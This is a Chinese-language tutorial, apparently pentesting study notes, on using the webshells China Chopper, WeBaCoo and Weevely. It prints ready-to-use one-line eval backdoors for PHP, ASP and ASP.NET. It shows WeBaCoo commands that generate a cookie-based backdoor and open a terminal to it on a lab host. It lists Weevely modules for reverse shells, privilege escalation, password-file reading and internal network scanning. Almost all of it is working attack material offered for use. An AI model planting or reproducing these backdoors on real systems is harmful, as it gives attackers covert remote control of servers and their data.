目录
二、 WeBaCoo (Web Backdoor Cookie)
一、中国菜刀
1.一句话木马
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2.将一句话木马上传至目标
3.使用菜刀连接webshell
4.菜刀功能展示
二、 WeBaCoo (Web Backdoor Cookie)
1.简介
- 类终端的shell,只针对 PHP
- 编码通信内容通过 cookie 头传输,隐蔽性较强
- Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令
- cn:服务器用于返回数据的 cookie 头的名
- cp:返回信息定界符
2.生成服务器端
- webacoo -g -o webacoo.php
-g Generate backdoor code (-o is required) -o OUTPUT Generated backdoor output filename
3.上传至目标
4.连接webshell
- webacoo -t -u http://10.10.10.132/webacoo.php
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL 
5.抓包分析流量(cookie传输)
- 解码
- 其他参数
root@kali:~# webacoo -h
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | [email protected] | http(s)://bechtsoudis.com }
Usage: webacoo [options]
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-e CMD Single command execution mode (-t and -u are required)
-m METHOD HTTP method to be used (default is GET)
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-l LOG Log activity to file
-h Display help and exit
update Check for updates and apply if any
三、Weevely
1.简介
隐蔽的终端 PHP Webshell,只针对 PHP
30 多个管理模块
- 执行系统命令
- 检查服务器常见配置错误
- 创建正向、反向 TCP Shell 连接
- 通过目标计算机代理iHTTP 流量
- 从目标计算机运行端口扫描,渗透内网
支持连接密码
2.生成webshell,并上传
3.连接webshell
4.help展示所模块
:audit_filesystem Audit system files for wrong permissions.
:audit_phpconf Audit PHP configuration.
:audit_etcpasswd Get /etc/passwd with different techniques.
:audit_suidsgid Find files with SUID or SGID flags.
:shell_su Elevate privileges with su command.
:shell_php Execute PHP commands.
:shell_sh Execute Shell commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_webdownload Download URL to the filesystem
:file_download Download file to remote filesystem.
:file_rm Remove remote file.
:file_upload Upload file to remote filesystem.
:file_grep Print lines matching a pattern in multiple files.
:file_bzip2 Compress or expand bzip2 files.
:file_cp Copy single file.
:file_tar Compress or expand tar archives.
:file_cd Change current working directory.
:file_zip Compress or expand zip files.
:file_ls List directory content.
:file_gzip Compress or expand gzip files.
:file_upload2web Upload file automatically to a web folder and get corresponding URL.
:file_edit Edit remote file on a local editor.
:file_read Read remote file from the remote filesystem.
:file_touch Change file timestamp.
:file_check Get remote file information.
:file_find Find files with given names and attributes.
:file_mount Mount remote filesystem using HTTPfs.
:file_enum Check existence and permissions of a list of paths.
:sql_dump Multi dbms mysqldump replacement.
:sql_console Execute SQL query or run console.
:net_ifconfig Get network interfaces addresses.
:net_scan TCP Port scan.
:net_curl Perform a curl-like HTTP request.
:net_proxy Proxify local HTTP traffic passing through the target.
:net_phpproxy Install PHP proxy on the target.
